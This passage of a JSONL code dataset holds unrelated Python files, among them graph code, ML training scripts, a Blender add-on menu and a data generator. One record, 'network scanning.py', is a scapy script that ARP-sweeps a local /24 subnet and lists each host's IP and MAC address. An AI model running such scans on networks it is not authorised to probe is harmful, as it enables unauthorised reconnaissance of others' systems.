-> v5\")\n arc51 = ArcNode(\"arc3: v5 -> v1\")\n arc25 = ArcNode(\"arc4: v2 -> v5\")\n arc52 = ArcNode(\"arc4: v5 -> v2\")\n arc24 = ArcNode(\"arc5: v2 -> v4\")\n arc42 = ArcNode(\"arc5: v4 -> v2\")\n arc34 = ArcNode(\"arc6: v3 -> v4\")\n arc43 = ArcNode(\"arc6: v4 -> v3\")\n arc35 = ArcNode(\"arc7: v3 -> v5\")\n arc53 = ArcNode(\"arc7: v5 -> v3\")\n\n v1.firstArc = arc12\n arc12.vnode = v2\n arc12.nextArcNode = arc13\n arc13.vnode = v3\n arc13.nextArcNode = arc15\n arc15.vnode = v5\n\n v2.firstArc = arc21\n arc21.vnode = v1\n arc21.nextArcNode = arc24\n arc24.vnode = v4\n arc24.nextArcNode = arc25\n arc25.vnode = v5\n\n v3.firstArc = arc31\n arc31.vnode = v1\n arc31.nextArcNode = arc34\n arc34.vnode = v4\n arc34.nextArcNode = arc35\n arc35.vnode = v5\n\n v4.firstArc = arc42\n arc42.vnode = v2\n arc42.nextArcNode = arc43\n arc43.vnode = v3\n\n v5.firstArc = arc51\n arc51.vnode = v1\n arc51.nextArcNode = arc52\n arc52.vnode = v2\n arc52.nextArcNode = arc53\n arc53.vnode = v3\n\n vls = [v1, v2, v3, v4, v5]\n undirectGraph = AdjvexStruct(vls, 2)\n\n for vn in vls:\n print(vn.data + \" \", end='')\n arc = vn.firstArc\n while arc is not None:\n print(\"(\" + arc.info + \") \", end='')\n arc = arc.nextArcNode\n print()\n\n\nif __name__ == \"__main__\":\n buildUnAdj()\n","sub_path":"graph/adjacency_list/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"88066323","text":"import numpy as np\n\nfrom .utils import *\nfrom .Functions import *\nfrom .IPMOptimizers import get_optimizer as get_ipm_opt\nfrom .UnconstrainedOptimizers import get_optimizer as get_unc_opt\n\nimport time\n\n\"\"\"Particle output will have the shape [[[]-particles]-timesteps] or paths[time_step][particle_idx]. Vals output has shape [[(obj, barrier, time)]-timestep]\"\"\"\n\n\n\n\ndef optimize(config, verbose=False):\n\n # init num_particles\n all_vals = []\n p_start = get_particles(config)\n p_curr = np.array([np.array(p) for p in p_start])\n p_num_particles = len(p_start)\n\n num_steps = config[\"num_path_steps\"]\n\n # get optimization method\n if config[\"optimization_type\"] == \"Unconstrained\":\n opt = get_unc_opt(config) \n elif config[\"optimization_type\"] == \"IPM\": \n opt = get_ipm_opt(config)\n\n if config[\"seed\"] is not None:\n np.random.seed(config[\"seed\"])\n\n for t in range(num_steps):\n print(t)\n\n p_curr, obj_barrier_vals = opt.update(p_curr, t, full_vals=True)\n p_curr = p_curr.copy()\n all_vals.append(obj_barrier_vals)\n \n return all_vals\n","sub_path":"new_adventure/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"338595480","text":"\nimport scapy.all as scapy\n\ndef scan(ip):\n arp_request=scapy.ARP(pdst=ip)\n # arp_request.show()\n broadcast = scapy.Ether(dst = \"ff:ff:ff:ff:ff:ff\")\n # broadcast.show()\n # scapy.ls(scapy.ARP())\n concadenate = broadcast/arp_request\n answered =scapy.srp(concadenate ,timeout=1,verbose=False)[0]\n # print(answered.summary())\n print(\"IP\\t\\t\\tMAC address\")\n for i in answered:\n print(i[1].psrc,i[1].hwsrc,sep=\"\\t\\t\")\n\n\n # scapy.arping(ip)\n\nscan(\"192.168.43.47/24\")\n\n\n\n\n\n\n\n\n\n\n","sub_path":"network scanning.py","file_name":"network scanning.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"189833374","text":"from yacs.config import CfgNode as CN\n\nC = CN()\n\nC.epochs = 50\nC.steps_per_epoch=None\nC.batch_size = 128\nC.n_features = 18\nC.n_samples = None\nC.w_optim='SGD'\nC.w_decay_order=2\nC.w_lr = 1e-3\nC.w_momentum=0.0\nC.w_weight_decay=5e-4\nC.a_optim=\"SGD\"\nC.a_decay_order=2\nC.a_lr = 1e-3\nC.a_momentum = 0.0\nC.a_weight_decay = 0.\nC.T = 2\nC.grad_clip = 100.\nC.grad_clip_bilevel=1000.\nC.logging_freq = 200\nC.w_checkpoint_freq = 1\nC.n_informative=7\nC.noise=0.25\nC.featurize_type=\"fourier\"\nC.initial_degree=1\nC.hvp=\"exact\"\nC.ihvp =\"exact\"\nC.inv_hess=\"exact\"\nC.normalize_a_lr=True\nC.w_warm_start=0\nC.log_grad_norm=True\nC.log_alphas=True\nC.alpha_weight_decay=0.\nC.grad_inner_loop_order=-1\nC.grad_outer_loop_order=-1\nC.arch_train_data=\"sotl\"\nC.model_type=\"vgg\"\nC.dataset=\"CIFAR\"\nC.device = 'cuda'\nC.train_arch=True\nC.dry_run=False\nC.mode=\"bilevel\"\nC.hessian_tracking=False\nC.smoke_test=True\nC.rand_seed = None\nC.w_scheduler=None\nC.a_scheduler=None\nC.features=None\nC.loss='ce'\nC.log_suffix = \"\"\nC.optimizer_mode = \"autograd\"\nC.bilevel_w_steps=None\nC.debug=False\nC.recurrent=True\nC.rand_seed=1\nC.adaptive_a_lr = False\nC.softplus_alpha_lr = False\nC.softplus_beta=100\nC.alpha_lr=1e-3\nC.arch_update_frequency=1\nC.loss_threshold=None\nC.progress_bar=True\nC.val_split=0.1\n\ndef get_cfg_defaults():\n \"\"\"Get a yacs CfgNode object with default values for my_project.\"\"\"\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return C.clone()\n\ncfg = C","sub_path":"sotl_nas/configs/lr/mnist_vgg.py","file_name":"mnist_vgg.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"7288987","text":"from queue import Queue\nimport os\nimport random\nimport string\nfrom threading import Thread\nimport time\nimport itertools\nimport csv\nimport sys\nimport multiprocessing\n\n''' Shared variable among processes to signal program termination '''\nexit_flag = multiprocessing.Value('i', 0)\n''' Shared variable among processes to sync last row '''\nlast_line = multiprocessing.Value('i', 0)\n\nclass MMChallengeProcessing:\n def __init__(self):\n self.jobqueue = multiprocessing.Queue()\n self.outfile = 'source.csv'\n self.outsize = 10 # MB\n self.file = open(self.outfile, 'w')\n \n self.start = 0\n self.end = 5000\n self.offset = 5000\n self.lock = multiprocessing.Lock()\n\n ''' Function to generate row specified in document, returns string with newline '''\n def generateRow(self, count):\n string1 = ''.join(random.choices(string.ascii_lowercase, k=random.randint(1,32)))\n string2 = ''.join(random.choices(string.ascii_lowercase, k=random.randint(1,32)))\n data = [str(count), str(random.randint(1,10)), string1, string2]\n return ','.join(data) + '\\n'\n\n\n ''' Generates and writes data for range of primary keys given. For example, if 2000, 4000 are passed as arguments, \n function will generate 2000 rows starting with id 2000 and ending at 4000. \n '''\n def calculateAndWrite(self, start, end):\n\n ''' Generate Data '''\n temp = ''\n for index in range(start, end):\n temp += (self.generateRow(index))\n\n ''' Loop until last line meets global start variable. Write and return '''\n while True:\n if exit_flag.value == 1:\n break\n if last_line.value == start:\n #print('writing {} : {}'.format(start, end))\n self.file.write(temp)\n last_line.value = end\n return\n\n ''' Pops jobs off queue to process ''' \n def processJobs(self, jobs):\n while True:\n window = self.jobqueue.get()\n start, end = window\n self.calculateAndWrite(start, end)\n if exit_flag.value == 1:\n break\n\n\n ''' Worker that will continuously add chunks of primary id's to calculate until file size is reached '''\n def loadJobs(self, lock):\n while (os.path.getsize(self.outfile)//1024**2) < self.outsize:\n self.jobqueue.put([self.start, self.end])\n self.start = self.end \n self.end += self.offset\n\n \n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n print(\"Cleaning up queue to exit\")\n with multiprocessing.Lock():\n exit_flag.value += 1\n while not self.jobqueue.empty():\n self.jobqueue.get()\n\n\n ''' Main function '''\n def run(self):\n\n ''' Write Header Row '''\n self.file.write('id,integer1,string1,string2\\n') \n ''' Flush to avoid rewrite of header '''\n self.file.flush()\n \n ''' Start pushing jobs to queue '''\n t = multiprocessing.Process(target=self.loadJobs, args=(self.lock, ))\n t.start()\n \n ''' Process jobs and write to file '''\n numProcesses = 100\n for work in range(0, numProcesses):\n worker = multiprocessing.Process(target=self.processJobs, args=(self.jobqueue,))\n worker.start()\n \n \nif __name__ == '__main__':\n print(\"Generating File...\")\n start_time = time.time()\n\n mm = MMChallengeProcessing()\n mm.run()\n \n\n \n \n","sub_path":"gen_multiprocessing.py","file_name":"gen_multiprocessing.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"370576106","text":"import ROOT as r \nimport numpy as np\nimport pickle,math,os\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\n\nimport tensorflow as tf\nfrom keras.backend import tensorflow_backend as K\n\nfrom keras import optimizers\n\n\ndef getCompiledModelA(nvars,nnodes):\n # optimal so far ( 0.980, 0.966)\n model = Sequential()\n model.add(Dense(30,input_dim=nvars, activation='relu'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(nnodes, activation='softmax'))\n adam = optimizers.adam(lr=1e-4) \n model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy','categorical_crossentropy'])\n return model\n\ndef getCompiledModelB(nvars,nnodes):\n model = Sequential()\n model.add(Dense(30,input_dim=nvars, activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(10, activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(nnodes, activation='softmax'))\n adam = optimizers.adam(lr=1e-4) \n model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy','categorical_crossentropy'])\n return model\n\ndef freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):\n \"\"\"\n Freezes the state of a session into a pruned computation graph.\n\n Creates a new computation graph where variable nodes are replaced by\n constants taking their current value in the session. The new graph will be\n pruned so subgraphs that are not necessary to compute the requested\n outputs are removed.\n @param session The TensorFlow session to be frozen.\n @param keep_var_names A list of variable names that should not be frozen,\n or None to freeze all the variables in the graph.\n @param output_names Names of the relevant graph outputs.\n @param clear_devices Remove the device directives from the graph for better portability.\n @return The frozen graph definition.\n \"\"\"\n from tensorflow.python.framework.graph_util import convert_variables_to_constants\n graph = session.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n # Graph -> GraphDef ProtoBuf\n input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = \"\"\n frozen_graph = convert_variables_to_constants(session, input_graph_def,\n output_names, freeze_var_names)\n return frozen_graph\n\ndef saveTF1p6Model(protobuffer_name):\n frozen_graph = freeze_session(K.get_session(),\n output_names=[out.op.name for out in model.outputs])\n tf.train.write_graph(frozen_graph, os.getcwd(), protobuffer_name, as_text=False)\n print (\"Saved frozen model in \",protobuffer_name)\n \n \nif __name__ == \"__main__\":\n\n from optparse import OptionParser\n parser = OptionParser(usage=\"%prog [options]\")\n parser.add_option(\"-i\", \"--infile\", dest=\"infile\", type=\"string\", default=\"vars.pkl\", help=\"Input pickle file (default: vars.pkl)\");\n parser.add_option(\"-o\", \"--outfile\", dest=\"outfile\", type=\"string\", default=\"trained_model\", help=\"Output pb and h5 fil;e (default: trained_model)\");\n parser.add_option(\"-c\", \"--channel\", dest=\"channel\", type=\"string\", default=\"2lss\", help=\"Final state: 2lss or 3l (default: 2lss)\");\n (options, args) = parser.parse_args()\n\n nvars = 29 if options.channel=='2lss' else 32 if options.channel=='3l' else 35\n\n data = pickle.load( open(options.infile,'rb'))\n sums = np.sum(data['train_y'],axis=0)\n print(sums)\n\n sig = sums[0]\n bkg = sums[1] + sums[2]\n #if options.channel=='2lss': bkg += sums[3]\n\n class_weight = { 0 : float((sig+bkg)/sig),\n 1 : float((sig+bkg)/bkg),\n 2 : float((sig+bkg)/bkg)}\n # if options.channel=='2lss':\n # class_weight.update( {3 : float((sig+bkg)/bkg)} )\n\n print ('weights will be', class_weight)\n\n with tf.Session(config=tf.ConfigProto(\n intra_op_parallelism_threads=50,\n inter_op_parallelism_threads=50)) as sess:\n K.set_session(sess)\n \n #nnodes = 4 if options.channel=='2lss' else 3\n nnodes = 3\n model = getCompiledModelA(nvars,nnodes)\n #model = getCompiledModelB(nvars,nnodes)\n\n history = model.fit( data['train_x'], data['train_y'], epochs=20, batch_size=80, validation_data=(data['test_x'], data['test_y']), class_weight=class_weight)\n\n modelname = os.getcwd()+'/'+os.path.basename(options.outfile).split('.')[0]\n # keras model (H5)\n model.save(modelname+'.h5')\n # tf model (PB)\n saveTF1p6Model(modelname+'.pb')\n \n pickle_out = open(modelname+'.pkl','wb')\n pickle.dump( history.history, pickle_out)\n pickle_out.close()\n \n","sub_path":"TTHAnalysis/python/tools/bdts/trainNet.py","file_name":"trainNet.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"634591751","text":"# Name: Joshua Fogus\n# Last Modified: February 11, 2021\n# Description: A text box for accepting free-form user input.\n\nimport tkinter as tk\n\n\ndef text_input(parent, label, variable):\n \"\"\" creates a text input attached to the given parent, with\n the given label, and storing the result in the given\n variable. Returns a tuple of the label and input. \"\"\"\n tk_label = tk.Label(parent, text=\"{}: \".format(label))\n tk_label.grid(row=2, column=0, sticky=tk.W, pady=(0, 4))\n\n tk_input = tk.Entry(parent, textvariable=variable)\n tk_input.grid(row=2, column=1, sticky=tk.W, pady=(0, 4))\n\n return tk_label, tk_input\n\n\nif __name__ == \"__main__\":\n print(\"This is not meant to be run as a script. Please import this module.\")","sub_path":"life_generator/gui/text_input.py","file_name":"text_input.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"189073112","text":"#!/usr/bin/env python\r\n#coding:utf-8\r\nimport pandas as pd\r\nfrom requests_html import HTMLSession\r\n\r\nsession = HTMLSession()\r\nurl = \"https://www.jianshu.com/p/85f4624485b9\"\r\nr = session.get(url)\r\n\r\nsel = \"body > div.note > div.post > div.article > div.show-content > div > p > a\"\r\n\r\ndef get_text_link_from_sel(sel):\r\n mylist = []\r\n try:\r\n results = r.html.find(sel)\r\n for result in results:\r\n mytext = result.text\r\n mylink = list(result.absolute_links)[0]\r\n mylist.append((mytext,mylink))\r\n return mylist\r\n except:\r\n return None\r\n\r\ndf = pd.DataFrame(get_text_link_from_sel(sel))\r\ndf.columns = [\"text\",\"link\"]\r\ndf.to_csv(\"output.csv\",encoding=\"gbk\",index=False)\r\n\r\n\r\n#print(r.html.text)\r\n#print(r.html.links)\r\n#print(r.html.absolute_links)\r\n# print(results[0].text)\r\n# print(results[0].absolute_links)\r\n# print(\r\n# list(results[0].absolute_links)\r\n# )\r\n#","sub_path":"Reptile.py","file_name":"Reptile.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"529994012","text":"data = [{\"name\": \"CR90 corvette\", \"class\": \"corvette\", \"cost\": \"3500000\", \"rating\": \n 5.7147, \"drive\": \"2.0\"}, \n{\"name\": \"Star Destroyer\", \"class\": \n \"Star Destroyer\", \"cost\": \"150000000\", \"rating\": 1.3338, \n \"drive\": \"2.0\"}, \n{\"name\": \"Sentinel-class landing craft\", \"class\": \"landing craft\", \"cost\": \"240000\", \n\"rating\": 4.166, \"drive\": \"1.0\"}, \n{\"name\": \"Death Star\", \"class\": \"Deep Space Mobile Battlestation\", \"cost\": \n \"1000000000000\", \"rating\": 4, \"drive\": \"4.0\"}, \n{\"name\": \"Millennium Falcon\", \"class\": \"Light freighter\", \"cost\": \"100000\", \"rating\": 5, \n \"drive\": \"0.5\"}, \n{\"name\": \"Y-wing\", \"class\": \"assault starfighter\", \"cost\": \n \"134999\", \"rating\": 7.407, \"drive\": \"1.0\"}, \n{\"name\": \"X-wing\", \"class\": \"Starfighter\", \"cost\": \"149999\", \"rating\": \n 6.666, \"drive\": \"1.0\"}, \n{\"name\": \"TIE Advanced x1\", \"class\": \"Starfighter\", \"cost\": \"unknown\", \"rating\": 0, \"drive\": \n \"1.0\"}, \n{\"name\": \"Executor\", \"class\": \"Star dreadnought\", \"cost\": \n \"1143350000\", \"rating\": 1.749, \"drive\": \"2.0\"}, \n{\"name\": \"Rebel transport\", \"class\": \"Medium transport\", \"cost\": \"unknown\", \"rating\": \n 0, \"drive\": \"4.0\"}, \n{\"name\": \"Slave 1\", \"class\": \"Patrol craft\", \"cost\": \"unknown\", \"rating\": 0, \"drive\": \"3.0\"}, \n{\"name\": \"Imperial shuttle\", \"class\": \"Armed government transport\", \"cost\": \"240000\", \"rating\": \n 4.1666, \"drive\": \"1.0\"}, \n{\"name\": \"EF76 Nebulon-B escort frigate\", \"class\": \"Escort ship\", \"cost\": \"8500000\", \"rating\": \n 2.352, \"drive\": \"2.0\"}, \n{\"name\": \"Calamari Cruiser\", \"class\": \"Star Cruiser\", \"cost\": \"104000000\", \"rating\": \n 9.615, \"drive\": \"1.0\"}, \n{\"name\": \"A-wing\", \"class\": \"Starfighter\", \"cost\": \"175000\", \"rating\": 5.714, \n \"drive\": \"1.0\"}, \n{\"name\": \"B-wing\", \"class\": \"Assault Starfighter\", \"cost\": \"220000\", \"rating\": \n 9.06, \"drive\": \"2.0\"}, {\"name\": \"Republic Cruiser\", \"class\": \"Space cruiser\", \n \"cost\": \"unknown\", \"rating\": 0, \"drive\": \"2.0\"}, \n{\"name\": \"Droid control ship\", \"class\": \"Droid control ship\", \"cost\": \"unknown\", \n \"rating\": 0, \"drive\": \"2.0\"}, {\"name\": \"Naboo fighter\", \"class\": \"Starfighter\", \n \"cost\": \"200000\", \"rating\": 5, \"drive\": \"1.0\"}, \n{\"name\": \"Naboo Royal Starship\", \"class\": \"yacht\", \"cost\": \"unknown\", \"rating\": 0, \"drive\": \"1.8\"}, {\"name\": \"Scimitar\", \"class\": \n \"Space Transport\", \"cost\": \"55000000\", \"rating\": 2.727, \n \"drive\": \"1.5\"}, \n{\"name\": \"J-type diplomatic barge\", \"class\": \"Diplomatic barge\", \"cost\": \"2000000\", \"rating\": 3.5, \"drive\": \"0.7\"}, \n{\"name\": \"AA-9 Coruscant freighter\", \"class\": \"freighter\", \"cost\": \"unknown\", \n \"rating\": 0, \"drive\": \"unknown\"}, \n{\"name\": \"Jedi starfighter\", \"class\": \"Starfighter\", \"cost\": \"180000\", \n \"rating\": 5.55, \"drive\": \"1.0\"}, \n{\"name\": \"H-type Nubian yacht\", \"class\": \"yacht\", \"cost\": \"unknown\", \n \"rating\": 0, \"drive\": \"0.9\"}, \n{\"name\": \"Republic Assault ship\", \"class\": \"assault ship\", \"cost\": \"unknown\", \"rating\": 0, \"drive\": \n \"0.6\"}, \n{\"name\": \"Solar Sailer\", \"class\": \"yacht\", \"cost\": \"35700\", \"rating\": 4.201, \n \"drive\": \"1.5\"}, {\"name\": \"Trade Federation cruiser\", \"class\": \"capital ship\", \n \"cost\": \"125000000\", \"rating\": 1.2, \"drive\": \"1.5\"}, \n{\"name\": \"Theta-class T-2c shuttle\", \"class\": \"transport\", \n \"cost\": \"1000000\", \"rating\": 1, \"drive\": \"1.0\"}, \n{\"name\": \"Republic attack cruiser\", \"class\": \"star destroyer\", \"cost\": \"59000000\", \"rating\": \n 1.69, \"drive\": \"1.0\"}, \n{\"name\": \"Naboo star skiff\", \"class\": \"yacht\", \"cost\": \"unknown\", \"rating\": 0, \"drive\": \"0.5\"}, \n{\"name\": \"Jedi Interceptor\", \"class\": \"starfighter\", \"cost\": \"320000\", \n \"rating\": 3.125, \"drive\": \"1.0\"}, \n{\"name\": \"arc-170\", \"class\": \"starfighter\", \"cost\": \"155000\", \"rating\": 6.451, \"drive\": \n \"1.0\"}, \n{\"name\": \"Banking clan frigte\", \"class\": \"cruiser\", \"cost\": \"57000000\",\n \"rating\": 1.754, \"drive\": \"1.0\"}, \n{\"name\": \"Belbullab-22 starfighter\", \"class\": \"starfighter\", \"cost\": \"168000\", \n \"rating\": 3.571, \"drive\": \"6\"}, \n{\"name\": \"V-wing\", \"class\": \"starfighter\", \"cost\": \"102500\", \"rating\": 9.756, \n \"drive\": \"1.0\"}]","sub_path":"app/tests/test_data_ships.py","file_name":"test_data_ships.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419570712","text":"ok = True\nfor subtask_path, return_value in task.run(\".subtask1/\", output_plugin=\"null\").items():\n if \"01_tasklet_1\" not in subtask_path:\n ok = False\n if return_value != \"OK\":\n ok = False\n\nif ok:\n return \"OK\"\nelse:\n return \"NOT OK\"\n","sub_path":"tests/plugins/content/task/01_run.py","file_name":"01_run.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"225883877","text":"# gpl author: Ryan Inch (Imaginer)\n\nimport bpy\nfrom bpy.types import Menu\nfrom . import utils_core\nfrom bl_ui.properties_paint_common import UnifiedPaintPanel\n\n# Particle Tools\n\nparticle_tools = (\n (\"None\", 'NONE'),\n (\"Comb\", 'COMB'),\n (\"Smooth\", 'SMOOTH'),\n (\"Add\", 'ADD'),\n (\"Length\", 'LENGTH'),\n (\"Puff\", 'PUFF'),\n (\"Cut\", 'CUT'),\n (\"Weight\", 'WEIGHT')\n)\n\n# Brush Datapaths\n\nbrush_datapath = {\n 'SCULPT': \"tool_settings.sculpt.brush\",\n 'VERTEX_PAINT': \"tool_settings.vertex_paint.brush\",\n 'WEIGHT_PAINT': \"tool_settings.weight_paint.brush\",\n 'TEXTURE_PAINT': \"tool_settings.image_paint.brush\",\n 'PARTICLE_EDIT': \"tool_settings.particle_edit.tool\"\n}\n\n# Brush Icons\n\nbrush_icon = {\n 'SCULPT': {\n \"BLOB\": 'BRUSH_BLOB',\n \"CLAY\": 'BRUSH_CLAY',\n \"CLAY_STRIPS\": 'BRUSH_CLAY_STRIPS',\n \"CREASE\": 'BRUSH_CREASE',\n \"DRAW\": 'BRUSH_SCULPT_DRAW',\n \"FILL\": 'BRUSH_FILL',\n \"FLATTEN\": 'BRUSH_FLATTEN',\n \"GRAB\": 'BRUSH_GRAB',\n \"INFLATE\": 'BRUSH_INFLATE',\n \"LAYER\": 'BRUSH_LAYER',\n \"MASK\": 'BRUSH_MASK',\n \"NUDGE\": 'BRUSH_NUDGE',\n \"PINCH\": 'BRUSH_PINCH',\n \"ROTATE\": 'BRUSH_ROTATE',\n \"SCRAPE\": 'BRUSH_SCRAPE',\n \"SIMPLIFY\": 'BRUSH_SUBTRACT',\n \"SMOOTH\": 'BRUSH_SMOOTH',\n \"SNAKE_HOOK\": 'BRUSH_SNAKE_HOOK',\n \"THUMB\": 'BRUSH_THUMB'\n },\n\n 'VERTEX_PAINT': {\n \"ADD\": 'BRUSH_ADD',\n \"BLUR\": 'BRUSH_BLUR',\n \"DARKEN\": 'BRUSH_DARKEN',\n \"LIGHTEN\": 'BRUSH_LIGHTEN',\n \"MIX\": 'BRUSH_MIX',\n \"MUL\": 'BRUSH_MULTIPLY',\n \"SUB\": 'BRUSH_SUBTRACT'\n },\n\n 'WEIGHT_PAINT': {\n \"ADD\": 'BRUSH_ADD',\n \"BLUR\": 'BRUSH_BLUR',\n \"DARKEN\": 'BRUSH_DARKEN',\n \"LIGHTEN\": 'BRUSH_LIGHTEN',\n \"MIX\": 'BRUSH_MIX',\n \"MUL\": 'BRUSH_MULTIPLY',\n \"SUB\": 'BRUSH_SUBTRACT'\n },\n\n 'TEXTURE_PAINT': {\n \"CLONE\": 'BRUSH_CLONE',\n \"DRAW\": 'BRUSH_TEXDRAW',\n \"FILL\": 'BRUSH_TEXFILL',\n \"MASK\": 'BRUSH_TEXMASK',\n \"SMEAR\": 'BRUSH_SMEAR',\n \"SOFTEN\": 'BRUSH_SOFTEN'\n }\n}\n\n\nclass BrushesMenu(Menu):\n bl_label = \"Brush\"\n bl_idname = \"VIEW3D_MT_sv3_brushes_menu\"\n\n def draw(self, context):\n mode = utils_core.get_mode()\n layout = self.layout\n settings = UnifiedPaintPanel.paint_settings(context)\n colum_n = utils_core.addon_settings(lists=False)\n\n layout.row().label(text=\"Brush\")\n layout.row().separator()\n\n has_brush = utils_core.get_brush_link(context, types=\"brush\")\n current_brush = eval(\"bpy.context.{}\".format(brush_datapath[mode])) if has_brush else None\n\n # get the current brush's name\n if current_brush and utils_core.get_mode() != 'PARTICLE_EDIT':\n current_brush = current_brush.name\n\n if mode == 'PARTICLE_EDIT':\n # if you are in particle edit mode add the menu items for particle mode\n for tool in particle_tools:\n utils_core.menuprop(\n layout.row(), tool[0], tool[1], brush_datapath[mode],\n icon='RADIOBUT_OFF', disable=True,\n disable_icon='RADIOBUT_ON'\n )\n else:\n column_flow = layout.column_flow(columns=colum_n)\n if utils_core.addon_settings(lists=True) == 'template':\n layout.template_ID_preview(settings, \"brush\",\n new=\"brush.add\", rows=3, cols=colum_n)\n else:\n # iterate over all the brushes\n for item in bpy.data.brushes:\n if mode == 'SCULPT':\n if item.use_paint_sculpt:\n # if you are in sculpt mode and the brush\n # is a sculpt brush add the brush to the menu\n utils_core.menuprop(\n column_flow.row(), item.name,\n 'bpy.data.brushes[\"%s\"]' % item.name,\n brush_datapath[mode], icon=brush_icon[mode][item.sculpt_tool],\n disable=True, custom_disable_exp=(item.name, current_brush),\n path=True\n )\n if mode == 'VERTEX_PAINT':\n if item.use_paint_vertex:\n # if you are in vertex paint mode and the brush\n # is a vertex paint brush add the brush to the menu\n utils_core.menuprop(\n column_flow.row(), item.name,\n 'bpy.data.brushes[\"%s\"]' % item.name,\n brush_datapath[mode], icon=brush_icon[mode][item.vertex_tool],\n disable=True, custom_disable_exp=(item.name, current_brush),\n path=True\n )\n if mode == 'WEIGHT_PAINT':\n if item.use_paint_weight:\n # if you are in weight paint mode and the brush\n # is a weight paint brush add the brush to the menu\n utils_core.menuprop(\n column_flow.row(), item.name,\n 'bpy.data.brushes[\"%s\"]' % item.name,\n brush_datapath[mode], icon=brush_icon[mode][item.vertex_tool],\n disable=True, custom_disable_exp=(item.name, current_brush),\n path=True\n )\n if utils_core.get_mode() == 'TEXTURE_PAINT':\n if item.use_paint_image:\n # if you are in texture paint mode and the brush\n # is a texture paint brush add the brush to the menu\n utils_core.menuprop(\n column_flow.row(), item.name,\n 'bpy.data.brushes[\"%s\"]' % item.name,\n brush_datapath[mode], icon=brush_icon[mode][item.image_tool],\n disable=True, custom_disable_exp=(item.name, current_brush),\n path=True\n )\n","sub_path":"engine/2.80/scripts/addons/space_view3d_brush_menus/brushes.py","file_name":"brushes.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"545860208","text":"import re\ndigit_match = re.compile(r\"\\d\")\nletter_match = re.compile(r\"\\w\")\n\ndef hey(text):\n if text.strip() == \"\":\n return \"Fine. Be that way!\"\n\n no_digits = digit_match.sub(\" \", text)\n has_letters = letter_match.search(no_digits) is not None\n\n if has_letters and text.upper() == text:\n return \"Whoa, chill out!\"\n\n if text.endswith(\"?\"):\n return \"Sure.\"\n\n return \"Whatever.\"\n","sub_path":"all_data/exercism_data/python/bob/710528d7813b41359dcb809944b426ad.py","file_name":"710528d7813b41359dcb809944b426ad.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"638855815","text":"\nfrom gui_design import gui\nimport sys\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom wave import plot_tmg\nfrom wave import plot_wave\nfrom wave import plot_bunch_moment\nfrom wave import plot_fft\nfrom wave import plot_all_mom\nfrom process import plot_process\nfrom process import plot_process_mom\nfrom process import process_13_15\nfrom process import betatron_13_15\nfrom process import cal_process_mom\nfrom process import quad_xy\nfrom noise import noise_analysis\nfrom extract import extract_data\nfrom extract import plot_pos\nfrom extract import adiabatic_dump\nfrom extract import betatron_ext\nfrom reflectance import reflectance\nfrom reflectance import process_ref\n##from BBA import BBA_cal\nfrom osc_quad import quad_osc\nfrom osc_quad import quad_osc_1212\nfrom zero_moment import zero\nfrom mabiki import mabiki_em\nfrom kiwamu import kiwamu_em\nfrom cmap import plot_cmap\n\nclass Application(gui.Design,object):\n def __init__(self):\n super(Application,self).__init__()\n self.select.configure(command=self._select)\n\n def _select(self):\n self.mode_num = self.num_mode.get()\n ### Home\n if self.mode_num == 16:\n self.reflesh()\n return\n ### BBA\n elif self.mode_num == 10:\n BBA_cal.extract_cal_vol()\n return\n ### mabiki\n elif self.mode_num == 14:\n mabiki_em.emittance()\n return\n ### mabiki\n elif self.mode_num == 15:\n quad_osc.emittance()\n return\n elif self.mode_num == 12:\n quad_osc_1212.emittance()\n return\n file_index = self.file_list.curselection()\n file_name = self.data_path+self.file_list.get(file_index[0]).replace(' ','')\n\n if not file_index: return\n ### extract\n elif self.mode_num == 5:\n extract_data.extract_vol(file_name)\n ### \n elif os.path.isdir(file_name):\n self.reflesh(path=file_name)\n else : self.act_mode(file_name=file_name)\n \n def act_mode(self,file_name):\n\n self.mode_num = self.num_mode.get()\n ### beam data\n if self.mode_num == 0:\n if 'wave_2' in file_name:\n 